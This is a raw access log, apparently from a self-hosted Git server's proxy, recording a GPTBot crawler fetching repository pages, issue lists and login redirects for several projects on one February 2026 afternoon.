"https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:12:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include" -[17/Feb/2026:18:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include" -[17/Feb/2026:18:12:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include" -[17/Feb/2026:18:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include" -[17/Feb/2026:18:12:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include" -[17/Feb/2026:18:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include" -[17/Feb/2026:18:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9845] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:18:12:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:18:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:18:12:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:18:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:18:12:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:18:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:18:12:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:18:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:18:12:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:18:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:18:12:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:18:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:18:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:18:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html?display=source" [Client 74.7.227.38] [Length 22733] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" -[17/Feb/2026:18:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html?display=source" [Client 74.7.227.38] [Length 22735] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" -[17/Feb/2026:18:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fwarn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 22149] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:18:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:12:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:18:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:18:12:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:18:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:18:12:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:18:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:18:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:18:12:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:12:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13313] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13312] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13319] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13315] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13319] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13313] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13309] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13321] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13313] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 